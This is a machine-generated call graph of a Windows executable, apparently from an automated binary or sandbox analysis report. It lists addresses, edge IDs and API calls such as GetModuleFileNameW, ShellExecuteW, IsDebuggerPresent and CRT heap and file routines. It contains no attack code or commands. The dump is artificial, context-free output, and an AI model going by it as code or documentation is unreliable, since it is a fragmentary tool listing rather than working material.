41f4d6 GetModuleFileNameW 87007->87066 87009 41651d 87010 416528 87009->87010 87114 411924 46 API calls 3 library calls 87009->87114 87070 41f2a4 87010->87070 87013 41652e 87014 416539 87013->87014 87115 411924 46 API calls 3 library calls 87013->87115 87084 411703 87014->87084 87017 416541 87019 41654c __wwincmdln 87017->87019 87116 411924 46 API calls 3 library calls 87017->87116 87088 40d6b0 87019->87088 87022 41657c 87118 411906 46 API calls _doexit 87022->87118 87025 416581 _fprintf 87026->86991 87027->86994 87029 417c34 87028->87029 87030 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 87028->87030 87119 4178ff 49 API calls _free 87029->87119 87032 417c87 TlsAlloc 87030->87032 87035 417cd5 TlsSetValue 87032->87035 87036 417d96 87032->87036 87034 417c39 87034->86998 87035->87036 87037 417ce6 __init_pointers 87035->87037 87036->86998 87120 418151 InitializeCriticalSectionAndSpinCount 87037->87120 87039 417d2a 87040 417d91 87039->87040 87121 416b49 87039->87121 87128 4178ff 49 API calls _free 87040->87128 87044 417d76 87127 41793c 46 API calls 4 library calls 87044->87127 87046 417d7e GetCurrentThreadId 87046->87036 87048 416b49 __calloc_crt 46 API calls 87047->87048 87056 41aabf 87048->87056 87049 41ac6a GetStdHandle 87057 41ac34 87049->87057 87050 416b49 __calloc_crt 46 API calls 87050->87056 87051 41acce SetHandleCount 87059 4164f7 87051->87059 87052 41ac7c GetFileType 87052->87057 87053 41abb4 87054 41abe0 GetFileType 87053->87054 87055 41abeb InitializeCriticalSectionAndSpinCount 87053->87055 87053->87057 87054->87053 87054->87055 87055->87053 87055->87059 87056->87050 87056->87053 87056->87057 87056->87059 87057->87049 87057->87051 87057->87052 87058 41aca2 InitializeCriticalSectionAndSpinCount 87057->87058 87058->87057 87058->87059 87059->87003 87113 411924 46 API calls 3 library calls 87059->87113 87061 41f595 87060->87061 87062 41f599 87060->87062 87061->87007 87138 416b04 87062->87138 87064 41f5bb _memmove 87065 41f5c2 FreeEnvironmentStringsW 87064->87065 87065->87007 87067 41f50b _wparse_cmdline 87066->87067 87068 416b04 __malloc_crt 46 API calls 87067->87068 87069 41f54e _wparse_cmdline 87067->87069 87068->87069 87069->87009 87071 41f2bc _wcslen 87070->87071 87075 41f2b4 87070->87075 87072 416b49 __calloc_crt 46 API calls 87071->87072 87077 41f2e0 _wcslen 87072->87077 87073 41f336 87145 413748 87073->87145 87075->87013 87076 416b49 __calloc_crt 46 API calls 87076->87077 87077->87073 87077->87075 87077->87076 87078 41f35c 87077->87078 87081 41f373 87077->87081 87144 41ef12 46 API calls __vswprintf_l 87077->87144 87080 413748 _free 46 API calls 87078->87080 87080->87075 87151 417ed3 87081->87151 87083 41f37f 87083->87013 87085 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 87084->87085 87087 411750 __IsNonwritableInCurrentImage 87085->87087 87170 41130a 51 API calls __cinit 87085->87170 87087->87017 87089 42e2f3 87088->87089 87090 40d6cc 87088->87090 87091 408f40 VariantClear 87090->87091 87092 40d707 87091->87092 87171 40ebb0 87092->87171 87095 40d737 87174 411951 87095->87174 87100 40d751 87186 40f4e0 SystemParametersInfoW SystemParametersInfoW 87100->87186 87102 40d75f 87187 40d590 GetCurrentDirectoryW 87102->87187 87104 40d767 SystemParametersInfoW 87105 40d794 87104->87105 87106 40d78d FreeLibrary 87104->87106 87107 408f40 VariantClear 87105->87107 87106->87105 87108 40d79d 87107->87108 87109 408f40 VariantClear 87108->87109 87110 40d7a6 87109->87110 87110->87022 87117 4118da 46 API calls _doexit 87110->87117 87111->86995 87112->86999 87117->87022 87118->87025 87119->87034 87120->87039 87123 416b52 87121->87123 87124 416b8f 87123->87124 87125 416b70 Sleep 87123->87125 87129 41f677 87123->87129 87124->87040 87124->87044 87126 416b85 87125->87126 87126->87123 87126->87124 87127->87046 87128->87036 87130 41f683 87129->87130 87135 41f69e _malloc 87129->87135 87131 41f68f 87130->87131 87130->87135 87137 417f77 46 API calls __getptd_noexit 87131->87137 87132 41f6b1 HeapAlloc 87134 41f6d8 87132->87134 87132->87135 87134->87123 87135->87132 87135->87134 87136 41f694 87136->87123 87137->87136 87141 416b0d 87138->87141 87139 4135bb _malloc 45 API calls 87139->87141 87140 416b43 87140->87064 87141->87139 87141->87140 87142 416b24 Sleep 87141->87142 87143 416b39 87142->87143 87143->87140 87143->87141 87144->87077 87146 41377c __dosmaperr 87145->87146 87147 413753 RtlFreeHeap 87145->87147 87146->87075 87147->87146 87148 413768 87147->87148 87154 417f77 46 API calls __getptd_noexit 87148->87154 87150 41376e GetLastError 87150->87146 87155 417daa 87151->87155 87154->87150 87156 417dc9 __call_reportfault 87155->87156 87157 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 87156->87157 87160 417eb5 __call_reportfault 87157->87160 87159 417ed1 GetCurrentProcess TerminateProcess 87159->87083 87161 41a208 87160->87161 87162 41a210 87161->87162 87163 41a212 IsDebuggerPresent 87161->87163 87162->87159 87169 41fe19 87163->87169 87166 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 87167 421ff0 __call_reportfault 87166->87167 87168 421ff8 GetCurrentProcess TerminateProcess 87166->87168 87167->87168 87168->87159 87169->87166 87170->87087 87227 40ebd0 87171->87227 87231 4182cb 87174->87231 87176 41195e 87238 4181f2 LeaveCriticalSection 87176->87238 87178 40d748 87179 4119b0 87178->87179 87180 4119d6 87179->87180 87181 4119bc 87179->87181 87180->87100 87181->87180 87273 417f77 46 API calls __getptd_noexit 87181->87273 87183 4119c6 87274 417f25 10 API calls __vswprintf_l 87183->87274 87185 4119d1 87185->87100 87186->87102 87275 401f20 87187->87275 87189 40d5b6 IsDebuggerPresent 87190 40d5c4 87189->87190 87191 42e1bb MessageBoxA 87189->87191 87192 42e1d4 87190->87192 87193 40d5e3 87190->87193 87191->87192 87447 403a50 52 API calls 3 library calls 87192->87447 87345 40f520 87193->87345 87197 40d63b 87200 40d643 87197->87200 87201 42e231 SetCurrentDirectoryW 87197->87201 87198 40d5fd GetFullPathNameW 87357 401460 87198->87357 87202 40d64c 87200->87202 87448 432fee 6 API calls 87200->87448 87201->87200 87372 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 87202->87372 87205 42e252 87205->87202 87207 42e25a GetModuleFileNameW 87205->87207 87209 42e274 87207->87209 87210 42e2cb GetForegroundWindow ShellExecuteW 87207->87210 87213 401b10 52 API calls 87209->87213 87212 40d688 87210->87212 87211 40d656 87214 40d669 87211->87214 87216 40e0c0 74 API calls 87211->87216 87218 40d692 SetCurrentDirectoryW 87212->87218 87215 42e281 87213->87215 87380 4091e0 87214->87380 87449 40d200 52 API calls 2 library calls 87215->87449 87216->87214 87218->87104 87221 42e28d 87450 40d200 52 API calls 2 library calls 87221->87450 87224 42e299 GetForegroundWindow ShellExecuteW 87225 42e2c6 87224->87225 87225->87212 87226 40ec00 LoadLibraryA GetProcAddress 87226->87095 87228 40d72e 87227->87228 87229 40ebd6 LoadLibraryA 87227->87229 87228->87095 87228->87226 87229->87228 87230 40ebe7 GetProcAddress 87229->87230 87230->87228 87232 4182e0 87231->87232 87233 4182f3 EnterCriticalSection 87231->87233 87239 418209 87232->87239 87233->87176 87235 4182e6 87235->87233 87266 411924 46 API calls 3 library calls 87235->87266 87238->87178 87240 418215 _fprintf 87239->87240 87241 418225 87240->87241 87242 41823d 87240->87242 87267 418901 46 API calls __NMSG_WRITE 87241->87267 87244 416b04 __malloc_crt 45 API calls 87242->87244 87250 41824b _fprintf 87242->87250 87246 418256 87244->87246 87245 41822a 87268 418752 46 API calls 6 library calls 87245->87268 87248 41825d 87246->87248 87249 41826c 87246->87249 87270 417f77 46 API calls __getptd_noexit 87248->87270 87253 4182cb __lock 45 API calls 87249->87253 87250->87235 87251 418231 87269 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 87251->87269 87256 418273 87253->87256 87257 4182a6 87256->87257 87258 41827b InitializeCriticalSectionAndSpinCount 87256->87258 87259 413748 _free 45 API calls 87257->87259 87260 418297 87258->87260 87261 41828b 87258->87261 87259->87260 87272 4182c2 LeaveCriticalSection _doexit 87260->87272 87262 413748 _free 45 API calls 87261->87262 87264 418291 87262->87264 87271 417f77 46 API calls __getptd_noexit 87264->87271 87267->87245 87268->87251 87270->87250 87271->87260 87272->87250 87273->87183 87274->87185 87451 40e6e0 87275->87451 87279 401f41 GetModuleFileNameW 87469 410100 87279->87469 87281 401f5c 87481 410960 87281->87481 87284 401b10 52 API calls 87285 401f81 87284->87285 87484 401980 87285->87484 87287 401f8e 87288 408f40 VariantClear 87287->87288 87289 401f9d 87288->87289 87290 401b10 52 API calls 87289->87290 87291 401fb4 87290->87291 87292 401980 53 API calls 87291->87292 87293 401fc3 87292->87293 87294 401b10 52 API calls 87293->87294 87295 401fd2 87294->87295 87492 40c2c0 87295->87492 87297 401fe1 87298 40bc70 52 API calls 87297->87298 87299 401ff3 87298->87299 87510 401a10 87299->87510 87301 401ffe 87517 4114ab 87301->87517 87304 428b05 87306 401a10 52 API calls 87304->87306 87305 402017 87307 4114ab __wcsicoll 58 API calls 87305->87307 87308 428b18 87306->87308 87309 402022 87307->87309 87311 401a10 52 API calls 87308->87311 87309->87308 87310 40202d 87309->87310 87312 4114ab __wcsicoll 58 API calls 87310->87312 87313 428b33 87311->87313 87314 402038 87312->87314 87316 428b3b GetModuleFileNameW 87313->87316 87315 402043 87314->87315 87314->87316 87317 4114ab __wcsicoll 58 API calls 87315->87317 87318 401a10 52 API calls 87316->87318 87319 40204e 87317->87319 87320 428b6c 87318->87320 87322 428b90 _wcscpy 87319->87322 87326 401a10 52 API calls 87319->87326 87336 402092 87319->87336 87321 40e0a0 52 API calls 87320->87321 87323 428b7a 87321->87323 87331 401a10 52 API calls 87322->87331 87327 401a10 52 API calls 87323->87327 87324 428bc6 87325 4020a3 87325->87324 87525 40e830 53 API calls 87325->87525 87329 402073 _wcscpy 87326->87329 87330 428b88 87327->87330 87334 401a10 52 API calls 87329->87334 87330->87322 87340 4020d0 87331->87340 87332 4020bb 87526 40cf00 53 API calls 87332->87526 87334->87336 87335 4020c6 87337 408f40 VariantClear 87335->87337 87336->87322 87336->87325 87337->87340 87338 402110 87342 408f40 VariantClear 87338->87342 87340->87338 87343 401a10 52 API calls 87340->87343 87527 40cf00 53 API calls 87340->87527 87528 40e6a0 53 API calls 87340->87528 87344 402120 ctype 87342->87344 87343->87340 87344->87189 87346 4295c9 __call_reportfault 87345->87346 87347 40f53c 87345->87347 87349 4295d9 GetOpenFileNameW 87346->87349 88217 410120 87347->88217 87349->87347 87352 40d5f5 87349->87352 87350 40f545 88221 4102b0 SHGetMalloc 87350->88221 87352->87197 87352->87198 87353 40f54c 88226 410190 GetFullPathNameW 87353->88226 87355 40f559 88237 40f570 87355->88237 88299 402400 87357->88299 87359 40146f 87362 428c29 _wcscat 87359->87362 88308 401500 87359->88308 87361 40147c 87361->87362 88316 40d440 87361->88316 87364 401489 87364->87362 87365 401491 GetFullPathNameW 87364->87365 87366 402160 52 API calls 87365->87366 87367 4014bb 87366->87367 87368 402160 52 API calls 87367->87368 87369 4014c8 87368->87369 87369->87362 87370 402160 52 API calls 87369->87370 87371 4014ee 87370->87371 87371->87197 87373 428361 87372->87373 87374 4103fc LoadImageW RegisterClassExW 87372->87374 88336 44395e EnumResourceNamesW LoadImageW 87373->88336 88335 410490 7 API calls 87374->88335 87377 40d651 87379 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 87377->87379 87378 428368 87379->87211 87381 409202 87380->87381 87382 42d7ad 87380->87382 87438 409216 ctype 87381->87438 88594 410940 330 API calls 87381->88594 88597 45e737 90 API calls 3 library calls 87382->88597 87385 409386 87386 40939c 87385->87386 88595 40f190 10 API calls 87385->88595 87386->87212 87446 401000 Shell_NotifyIconW __call_reportfault 87386->87446 87388 4095b2 87388->87386 87390 4095bf 87388->87390 87389 409253 PeekMessageW 87389->87438 88596 401a50 330 API calls 87390->88596 87392 40d410 VariantClear 87392->87438 87393 4095c6 LockWindowUpdate DestroyWindow GetMessageW 87393->87386 87395 4095f9 87393->87395 87394 42d8cd Sleep 87394->87438 87399 42e158 TranslateMessage DispatchMessageW GetMessageW 87395->87399 87397 42e13b 88611 40d410 VariantClear 87397->88611 87399->87399 87402 42e188 87399->87402 87401 409567 PeekMessageW 87401->87438 87402->87386 87405 46f3c1 107 API calls 87405->87438 87406 40e0a0 52 API calls 87406->87438 87407 46fdbf 108 API calls 87445 4094e0 87407->87445 87408 409551 TranslateMessage DispatchMessageW 87408->87401 87410 42dcd2 WaitForSingleObject 87413 42dcf0 GetExitCodeProcess CloseHandle 87410->87413 87410->87438 87411 44c29d 52 API calls 87411->87445 87412 42dd3d Sleep 87412->87445 88604 40d410 VariantClear 87413->88604 87417 4094cf Sleep 87417->87445 87419 408f40 VariantClear 87419->87445 87421 42d94d timeGetTime 88600 465124 53 API calls 87421->88600 87422 40c620 timeGetTime 87422->87445 87425 465124 53 API calls 87425->87445 87426 42dd89 CloseHandle 87426->87445 87427 47d33e 308 API calls 87427->87438 87429 42de19 GetExitCodeProcess CloseHandle 87429->87445 87430 403cd0 VariantClear 87433 42de88 Sleep 87430->87433 87431 401b10 52 API calls 87431->87445 87433->87438 87437 408cc0 199 API calls 87437->87438 87438->87385 87438->87389 87438->87392 87438->87394 87438->87397 87438->87401 87438->87405 87438->87406 87438->87408 87438->87410 87438->87412 87438->87417 87438->87421 87438->87427 87438->87437 87439 42e0cc VariantClear 87438->87439 87440 408f40 VariantClear 87438->87440 87441 45e737 90 API calls 87438->87441 87438->87445 88337 4091b0 87438->88337 88395 40afa0 87438->88395 88421 408fc0 87438->88421 88456 40d150 87438->88456 88461 40d170 87438->88461 88467 4096a0 87438->88467 88598 465124 53 API calls 87438->88598 88599 40c620 timeGetTime 87438->88599 88610 40e270 VariantClear ctype 87438->88610 87439->87438 87440->87438 87441->87438 87443 401980 53 API calls 87443->87445 87445->87407 87445->87411 87445->87419 87445->87422 87445->87425 87445->87426 87445->87429 87445->87430 87445->87431 87445->87433 87445->87438 87445->87443 88601 45178a 54 API calls 87445->88601 88602 47d33e 330 API calls 87445->88602 88603 453bc6 54 API calls 87445->88603 88605 40d410 VariantClear 87445->88605 88606 443d19 67 API calls _wcslen 87445->88606 88607 4574b4 VariantClear 87445->88607 88608 4731e1 VariantClear 87445->88608 88609 4331a2 6 API calls 87445->88609 87446->87212 87447->87197 87448->87205 87449->87221 87450->87224 87452 40bc70 52 API calls 87451->87452 87453 401f31 87452->87453 87454 402560 87453->87454 87455 40256d __write_nolock 87454->87455 87456 402160 52 API calls 87455->87456 87458 402593 87456->87458 87462 4025bd 87458->87462 87529 401c90 87458->87529 87459 4026f0 52 API calls 87459->87462 87460 4026db 87460->87279 87461 4026a7 87461->87460 87463 401b10 52 API calls 87461->87463 87462->87459 87462->87461 87464 401b10 52 API calls 87462->87464 87467 401c90 52 API calls 87462->87467 87532 40d7c0 52 API calls 2 library calls 87462->87532 87465 4026d1 87463->87465 87464->87462 87533 40d7c0 52 API calls 2 library calls 87465->87533 87467->87462 87534 40f760 87469->87534 87472 410118 87472->87281 87474 42805d 87475 42806a 87474->87475 87590 431e58 87474->87590 87477 413748 _free 46 API calls 87475->87477 87478 428078 87477->87478 87479 431e58 82 API calls 87478->87479 87480 428084 87479->87480 87480->87281 87482 4115d7 52 API calls 87481->87482 87483 401f74 87482->87483 87483->87284 87485 4019a3 87484->87485 87486 401985 87484->87486 87485->87486 87487 4019b8 87485->87487 87489 40199f 87486->87489 88205 403e10 53 API calls 87486->88205 88206 403e10 53 API calls 87487->88206 87489->87287 87491 4019c4 87491->87287 87493 40c2c7 87492->87493 87494 40c30e 87492->87494 87495 40c2d3 87493->87495 87496 426c79 87493->87496 87497 40c315 87494->87497 87498 426c2b 87494->87498 88207 403ea0 52 API calls __cinit 87495->88207 88212 4534e3 52 API calls 87496->88212 87502 40c321 87497->87502 87503 426c5a 87497->87503 87500 426c4b 87498->87500 87501 426c2e 87498->87501 88210 4534e3 52 API calls 87500->88210 87509 40c2de 87501->87509 88209 4534e3 52 API calls 87501->88209 88208 403ea0 52 API calls __cinit 87502->88208 88211 4534e3 52 API calls 87503->88211 87509->87297 87511 401a30 87510->87511 87512 401a17 87510->87512 87513 402160 52 API calls 87511->87513 87514 401a2d 87512->87514 88213 403c30 52 API calls _memmove 87512->88213 87516 401a3d 87513->87516 87514->87301 87516->87301 87518 411523 87517->87518 87519 4114ba 87517->87519 88216 4113a8 58 API calls 3 library calls 87518->88216 87523 40200c 87519->87523 88214 417f77 46 API calls __getptd_noexit 87519->88214 87522 4114c6 88215 417f25 10 API calls __vswprintf_l 87522->88215 87523->87304 87523->87305 87525->87332 87526->87335 87527->87340 87528->87340 87530 4026f0 52 API calls 87529->87530 87531 401c97 87530->87531 87531->87458 87532->87462 87533->87460 87535 40f6f0 54 API calls 87534->87535 87536 40f77b _strcat ctype 87535->87536 87594 40f850 87536->87594 87541 427c2a 87624 414d04 87541->87624 87543 40f7fc 87543->87541 87545 40f804 87543->87545 87611 414a46 87545->87611 87549 40f80e 87549->87472 87553 4528bd 87549->87553 87550 427c59 87630 414fe2 87550->87630 87552 427c79 87554 4150d1 _fseek 81 API calls 87553->87554 87555 452930 87554->87555 88130 452719 87555->88130 87558 452948 87558->87474 87559 414d04 __fread_nolock 61 API calls 87560 452966 87559->87560 87561 414d04 __fread_nolock 61 API calls 87560->87561 87562 452976 87561->87562 87563 414d04 __fread_nolock 61 API calls 87562->87563 87564 45298f 87563->87564 87565 414d04 __fread_nolock 61 API calls 87564->87565 87566 4529aa 87565->87566 87567 4150d1 _fseek 81 API calls 87566->87567 87568 4529c4 87567->87568 87569 4135bb _malloc 46 API calls 87568->87569 87570 4529cf 87569->87570 87571 4135bb _malloc 46 API calls 87570->87571 87572 4529db 87571->87572 87573 414d04 __fread_nolock 61 API calls 87572->87573 87574 4529ec 87573->87574 87575 44afef GetSystemTimeAsFileTime 87574->87575 87576 452a00 87575->87576 87577 452a36 87576->87577 87578 452a13 87576->87578 87580 452aa5 87577->87580 87581 452a3c 87577->87581 87579 413748 _free 46 API calls 87578->87579 87582 452a1c 87579->87582 87584 413748 _free 46 API calls 87580->87584 88136 44b1a9 87581->88136 87585 413748 _free 46 API calls 87582->87585 87587 452aa3 87584->87587 87588 452a25 87585->87588 87586 452a9d 87589 413748 _free 46 API calls 87586->87589 87587->87474 87588->87474 87589->87587 87591 431e64 87590->87591 87593 431e6a 87590->87593 87592 414a46 __fcloseall 82 API calls 87591->87592 87592->87593 87593->87475 87596 40f85d __call_reportfault _strlen 87594->87596 87595 426b3b 87596->87595 87598 40f7ab 87596->87598 87643 414db8 87596->87643 87599 4149c2 87598->87599 87658 414904 87599->87658 87601 40f7e9 87601->87541 87602 40f5c0 87601->87602 87606 40f5cd _strcat __write_nolock _memmove 87602->87606 87603 414d04 __fread_nolock 61 API calls 87603->87606 87605 425d11 87607 4150d1 _fseek 81 API calls 87605->87607 87606->87603 87606->87605 87610 40f691 __tzset_nolock 87606->87610 87746 4150d1 87606->87746 87608 425d33 87607->87608 87609 414d04 __fread_nolock 61 API calls 87608->87609 87609->87610 87610->87543 87612 414a52 _fprintf 87611->87612 87613 414a64 87612->87613 87614 414a79 87612->87614 87886 417f77 46 API calls __getptd_noexit 87613->87886 87616 415471 __lock_file 47 API calls 87614->87616 87621 414a74 _fprintf 87614->87621 87619 414a92 87616->87619 87617 414a69 87887 417f25 10 API calls __vswprintf_l 87617->87887 87870 4149d9 87619->87870 87621->87549 87955 414c76 87624->87955 87626 414d1c 87627 44afef 87626->87627 88123 442c5a 87627->88123 87629 44b00d 87629->87550 87631 414fee _fprintf 87630->87631 87632 414ffa 87631->87632 87633 41500f 87631->87633 88127 417f77 46 API calls __getptd_noexit 87632->88127 87634 415471 __lock_file 47 API calls 87633->87634 87637 415017 87634->87637 87636 414fff 88128 417f25 10 API calls __vswprintf_l 87636->88128 87639 414e4e __ftell_nolock 51 API calls 87637->87639 87640 415024 87639->87640 88129 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 87640->88129 87641 41500a _fprintf 87641->87552 87644 414dd6 87643->87644 87645 414deb 87643->87645 87654 417f77 46 API calls __getptd_noexit 87644->87654 87645->87644 87647 414df2 87645->87647 87656 41b91b 79 API calls 10 library calls 87647->87656 87648 414ddb 87655 417f25 10 API calls __vswprintf_l 87648->87655 87651 414e18 87652 414de6 87651->87652 87657 418f98 77 API calls 7 library calls 87651->87657 87652->87596 87654->87648 87655->87652 87656->87651 87657->87652 87661 414910 _fprintf 87658->87661 87659 414923 87714 417f77 46 API calls __getptd_noexit 87659->87714 87661->87659 87663 414951 87661->87663 87662 414928 87715 417f25 10 API calls __vswprintf_l 87662->87715 87677 41d4d1 87663->87677 87666 414956 87667 41496a 87666->87667 87668 41495d 87666->87668 87669 414992 87667->87669 87670 414972 87667->87670 87716 417f77 46 API calls __getptd_noexit 87668->87716 87694 41d218 87669->87694 87717 417f77 46 API calls __getptd_noexit 87670->87717 87676 414933 @_EH4_CallFilterFunc@8 _fprintf 87676->87601 87678 41d4dd _fprintf 87677->87678 87679 4182cb __lock 46 API calls 87678->87679 87692 41d4eb 87679->87692 87680 41d560 87719 41d5fb 87680->87719 87681 41d567 87682 416b04 __malloc_crt 46 API calls 87681->87682 87684 41d56e 87682->87684 87684->87680 87686 41d57c InitializeCriticalSectionAndSpinCount 87684->87686 87685 41d5f0 _fprintf 87685->87666 87687 41d59c 87686->87687 87688 41d5af EnterCriticalSection 87686->87688 87691 413748 _free 46 API calls 87687->87691 87688->87680 87689 418209 __mtinitlocknum 46 API calls 87689->87692 87691->87680 87692->87680 87692->87681 87692->87689 87722 4154b2 47 API calls __lock 87692->87722 87723 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87692->87723 87695 41d23a 87694->87695 87696 41d255 87695->87696 87708 41d26c __wopenfile 87695->87708 87728 417f77 46 API calls __getptd_noexit 87696->87728 87698 41d421 87701 41d47a 87698->87701 87702 41d48c 87698->87702 87699 41d25a 87729 417f25 10 API calls __vswprintf_l 87699->87729 87733 417f77 46 API calls __getptd_noexit 87701->87733 87725 422bf9 87702->87725 87705 41499d 87718 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 87705->87718 87706 41d47f 87734 417f25 10 API calls __vswprintf_l 87706->87734 87708->87698 87708->87701 87708->87708 87730 41341f 58 API calls 2 library calls 87708->87730 87710 41d41a 87710->87698 87731 41341f 58 API calls 2 library calls 87710->87731 87712 41d439 87712->87698 87732 41341f 58 API calls 2 library calls 87712->87732 87714->87662 87715->87676 87716->87676 87717->87676 87718->87676 87724 4181f2 LeaveCriticalSection 87719->87724 87721 41d602 87721->87685 87722->87692 87723->87692 87724->87721 87735 422b35 87725->87735 87727 422c14 87727->87705 87728->87699 87729->87705 87730->87710 87731->87712 87732->87698 87733->87706 87734->87705 87737 422b41 _fprintf 87735->87737 87736 422b54 87738 417f77 __vswprintf_l 46 API calls 87736->87738 87737->87736 87739 422b8a 87737->87739 87740 422b59 87738->87740 87741 422400 __tsopen_nolock 109 API calls 87739->87741 87742 417f25 __vswprintf_l 10 API calls 87740->87742 87743 422ba4 87741->87743 87745 422b63 _fprintf 87742->87745 87744 422bcb __wsopen_helper LeaveCriticalSection 87743->87744 87744->87745 87745->87727 87748 4150dd _fprintf 87746->87748 87747 4150e9 87777 417f77 46 API calls __getptd_noexit 87747->87777 87748->87747 87749 41510f 87748->87749 87759 415471 87749->87759 87752 4150ee 87778 417f25 10 API calls __vswprintf_l 87752->87778 87758 4150f9 _fprintf 87758->87606 87760 415483 87759->87760 87761 4154a5 EnterCriticalSection 87759->87761 87760->87761 87762 41548b 87760->87762 87763 415117 87761->87763 87764 4182cb __lock 46 API calls 87762->87764 87765 415047 87763->87765 87764->87763 87766 415067 87765->87766 87767 415057 87765->87767 87772 415079 87766->87772 87780 414e4e 87766->87780 87835 417f77 46 API calls __getptd_noexit 87767->87835 87771 41505c 87779 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 87771->87779 87797 41443c 87772->87797 87775 4150b9 87810 41e1f4 87775->87810 87777->87752 87778->87758 87779->87758 87781 414e61 87780->87781 87782 414e79 87780->87782 87836 417f77 46 API calls __getptd_noexit 87781->87836 87784 414139 _fprintf 46 API calls 87782->87784 87786 414e80 87784->87786 87785 414e66 87837 417f25 10 API calls __vswprintf_l 87785->87837 87789 41e1f4 __write 51 API calls 87786->87789 87788 414e71 87788->87772 87790 414e97 87789->87790 87790->87788 87791 414f09 87790->87791 87793 414ec9 87790->87793 87838 417f77 46 API calls __getptd_noexit 87791->87838 87793->87788 87794 41e1f4 __write 51 API calls 87793->87794 87795 414f64 87794->87795 87795->87788 87796 41e1f4 __write 51 API calls 87795->87796 87796->87788 87798 414455 87797->87798 87799 414477 87797->87799 87798->87799 87800 414139 _fprintf 46 API calls 87798->87800 87803 414139 87799->87803 87801 414470 87800->87801 87839 41b7b2 77 API calls 5 library calls 87801->87839 87804 414145 87803->87804 87805 41415a 87803->87805 87840 417f77 46 API calls __getptd_noexit 87804->87840 87805->87775 87807 41414a 87841 417f25 10 API calls __vswprintf_l 87807->87841 87809 414155 87809->87775 87811 41e200 _fprintf 87810->87811 87812 41e223 87811->87812 87813 41e208 87811->87813 87814 41e22f 87812->87814 87819 41e269 87812->87819 87862 417f8a 46 API calls __getptd_noexit 87813->87862 87864 417f8a 46 API calls __getptd_noexit 87814->87864 87817 41e20d 87863 417f77 46 API calls __getptd_noexit 87817->87863 87818 41e234 87865 417f77 46 API calls __getptd_noexit 87818->87865 87842 41ae56 87819->87842 87823 41e23c 87866 417f25 10 API calls __vswprintf_l 87823->87866 87824 41e26f 87827 41e291 87824->87827 87828 41e27d 87824->87828 87825 41e215 _fprintf 87825->87771 87867 417f77 46 API calls __getptd_noexit 87827->87867 87852 41e17f 87828->87852 87831 41e289 87869 41e2c0 LeaveCriticalSection __unlock_fhandle 87831->87869 87832 41e296 87868 417f8a 46 API calls __getptd_noexit 87832->87868 87835->87771 87836->87785 87837->87788 87838->87788 87839->87799 87840->87807 87841->87809 87843 41ae62 _fprintf 87842->87843 87844 41aebc 87843->87844 87847 4182cb __lock 46 API calls 87843->87847 87845 41aec1 EnterCriticalSection 87844->87845 87846 41aede _fprintf 87844->87846 87845->87846 87846->87824 87848 41ae8e 87847->87848 87849 41aeaa 87848->87849 87850 41ae97 InitializeCriticalSectionAndSpinCount 87848->87850 87851 41aeec ___lock_fhandle LeaveCriticalSection 87849->87851 87850->87849 87851->87844 87853 41aded __commit 46 API calls 87852->87853 87854 41e18e 87853->87854 87855 41e1a4 SetFilePointer 87854->87855 87856 41e194 87854->87856 87858 41e1c3 87855->87858 87859 41e1bb GetLastError 87855->87859 87857 417f77 __vswprintf_l 46 API calls 87856->87857 87860 41e199 87857->87860 87858->87860 87861 417f9d __dosmaperr 46 API calls 87858->87861 87859->87858 87860->87831 87861->87860 87862->87817 87863->87825 87864->87818 87865->87823 87866->87825 87867->87832 87868->87831 87869->87825 87871 4149ea 87870->87871 87872 4149fe 87870->87872 87916 417f77 46 API calls __getptd_noexit 87871->87916 87873 4149fa 87872->87873 87875 41443c __flush 77 API calls 87872->87875 87888 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 87873->87888 87878 414a0a 87875->87878 87876 4149ef 87917 417f25 10 API calls __vswprintf_l 87876->87917 87889 41d8c2 87878->87889 87881 414139 _fprintf 46 API calls 87882 414a18 87881->87882 87893 41d7fe 87882->87893 87884 414a1e 87884->87873 87885 413748 _free 46 API calls 87884->87885 87885->87873 87886->87617 87887->87621 87888->87621 87890 41d8d2 87889->87890 87892 414a12 87889->87892 87891 413748 _free 46 API calls 87890->87891 87890->87892 87891->87892 87892->87881 87894 41d80a _fprintf 87893->87894 87895 41d812 87894->87895 87896 41d82d 87894->87896 87933 417f8a 46 API calls __getptd_noexit 87895->87933 87897 41d839 87896->87897 87903 41d873 87896->87903 87935 417f8a 46 API calls __getptd_noexit 87897->87935 87899 41d817 87934 417f77 46 API calls __getptd_noexit 87899->87934 87902 41d83e 87936 417f77 46 API calls __getptd_noexit 87902->87936 87905 41ae56 ___lock_fhandle 48 API calls 87903->87905 87906 41d879 87905->87906 87908 41d893 87906->87908 87909 41d887 87906->87909 87907 41d846 87937 417f25 10 API calls __vswprintf_l 87907->87937 87938 417f77 46 API calls __getptd_noexit 87908->87938 87918 41d762 87909->87918 87913 41d88d 87939 41d8ba LeaveCriticalSection __unlock_fhandle 87913->87939 87914 41d81f _fprintf 87914->87884 87916->87876 87917->87873 87940 41aded 87918->87940 87920 41d7c8 87953 41ad67 47 API calls 2 library calls 87920->87953 87921 41d772 87921->87920 87922 41d7a6 87921->87922 87924 41aded __commit 46 API calls 87921->87924 87922->87920 87925 41aded __commit 46 API calls 87922->87925 87928 41d79d 87924->87928 87929 41d7b2 CloseHandle 87925->87929 87926 41d7d0 87927 41d7f2 87926->87927 87954 417f9d 46 API calls 3 library calls 87926->87954 87927->87913 87931 41aded __commit 46 API calls 87928->87931 87929->87920 87932 41d7be GetLastError 87929->87932 87931->87922 87932->87920 87933->87899 87934->87914 87935->87902 87936->87907 87937->87914 87938->87913 87939->87914 87941 41ae12 87940->87941 87942 41adfa 87940->87942 87945 417f8a __write_nolock 46 API calls 87941->87945 87946 41ae51 87941->87946 87943 417f8a __write_nolock 46 API calls 87942->87943 87944 41adff 87943->87944 87947 417f77 __vswprintf_l 46 API calls 87944->87947 87948 41ae23 87945->87948 87946->87921 87949 41ae07 87947->87949 87950 417f77 __vswprintf_l 46 API calls 87948->87950 87949->87921 87951 41ae2b 87950->87951 